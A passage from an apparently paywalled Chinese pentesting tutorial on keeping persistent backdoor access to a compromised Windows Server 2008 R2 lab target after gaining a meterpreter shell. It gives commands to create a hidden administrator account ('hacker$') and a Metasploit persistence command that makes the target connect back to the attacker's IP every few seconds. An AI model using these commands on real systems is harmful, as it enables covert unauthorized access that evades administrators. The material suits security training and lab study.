攻击主机: Kali 192.168.11.106
靶机:windows server 2008 r2 192.168.11.134
零、为何要创建后门
当成功获取目标系统的访问权限后,需要寻找方法来恢复与目标主机的连接,而无需再进入目标系统。如果目标用户破坏了该连接,例如
重新启动计算机,此时使用后门将允许自动重新与目标系统建立连
接,
不必每次都需要进行攻击取得 meterpreter
。
为了后续渗透方便,所以需要创建一个后门。这样,即使连接被中断,也不会影响工作。下面将介绍创建持久后门的几种方式。
前提:
获得 meterpreter shell
创建后门的几种方式:
-
靶机创建隐藏用户,后期可直接使用隐藏用户登录目标主机;
-
通过persistence脚本安装后门;
-
通过metsvc服务的方式;
-
持久化后门netcat
-
通过开启远程桌面
一、靶机创建隐藏用户
1、进入靶机
meterpreter > shell
2.创建用户
(
注意这里用户使用了$符号,可以起到隐藏创建用户的目的
)
C:\Windows\system32>
net user hacker$ Hacker_123 /add
3、将创建的用户添加到管理员组
C:\Windows\system32>
net localgroup administrators hacker$ /add
net user查看不到hacker$用户,但在靶机上还是能看到你创建的这个隐藏用户:
可以使用hacker$/Hacker_123这个用户登录到靶机。
二、通过persistence脚本安装后门
路径:
metasploit/scripts/meterpreter/persistence.rb
,用于创建通过启动项启动。会创建注册表,创建文件,
很容易被杀软拦截
。
帮助文档:
1、执行 run persistence
-S -U -X
-i
5
-p
8888
-r
192.168.11.106
#
这样靶机在系统登陆,用户登陆,开机,使用中每隔5秒都

本文介绍了在成功入侵目标系统后,如何创建多种类型的后门以保持持久连接。包括创建隐藏用户、使用persistence脚本、metsvc服务、netcat及远程桌面等方式。
最低0.47元/天 解锁文章
846

被折叠的 条评论
为什么被折叠?



